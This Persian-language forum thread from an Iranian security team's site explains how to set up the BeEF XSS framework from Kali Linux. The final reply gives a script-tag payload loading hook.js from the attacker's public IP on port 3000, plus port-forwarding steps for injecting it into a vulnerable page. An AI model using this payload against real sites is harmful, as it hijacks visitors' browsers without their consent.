رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام.خواستم بدونم ما برای استفاده از beef Xss باید اونو روی یه سرور تو اینترنت آپلود کنیم؟ یا فقط روی لینوکس خودمون نصب باشه کافیه؟؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام اگر از کالی استفاده میکنی نیازی به نصب نداره و نیازی نیست که حتما روی یه سرور اجرا بشه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

یعنی توی کالی فقط آی پی خودم رو اضافه کنم به اون لینک و بفرستم؟ آخه فایل اسکریپت روی سیستم من به صورت لوکال وجود داره ، روی سیستم دیگه قابل دسترسی نیست

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

یعنی توی کالی فقط آی پی خودم رو اضافه کنم به اون لینک و بفرستم؟ آخه فایل اسکریپت روی سیستم من به صورت لوکال وجود داره ، روی سیستم دیگه قابل دسترسی نیست

 

خودت تغییرباید بدی مثلا

http://ipvalid:3000/hook.js

بعد پورت رو فوروارد میکنی به ip local کالی ;)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خودت تغییرباید بدی مثلا

http://ipvalid:3000/hook.js

بعد پورت رو فوروارد میکنی به ip local کالی ;)

به جای این ipvalid چی باید بذارم؟ آی پی خودم؟؟؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

به جای این ipvalid چی باید بذارم؟ آی پی خودم؟؟؟

ببینید منظورم اینه که beef  رو باید مثل یه سایت آپلود کنم رو یه سرور؟ یا اینکه فایل hook.js  رو آپلود کنم؟ 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سوالات رو در بخش سوالات بپرسین نه در انجمن و پست های آموزشی.

در صورت مشاهده مجدد به شدت برخورد خواهد شد.

اینبار چشم پوشی میشه و به بخش سوالات منتقل شد.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

اصلا نیازی به اپلود نیست

خوب دقت کنید

beef رو که اجرا میکنی روی کالی یه پنل تحت وب بشما میده و یه آدرس اسکریپت

پنل ور بهش لاگین میکنی

ادرس اسکریپت رو هم به این شکل عوض کن

http://ipvalid:3000/hook.js

برای پیدا کردن ای پی تونم فقط کافیه my ip رو تو گوگل سرچ کنی

حالا این کد رو جای که این اسیب پذیری هست قرار میدی

<script src="http://ipvalid:3000/hook.js" type="text/javascript"></script>

و وارد پنل beef میشی و منتظر میمونی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...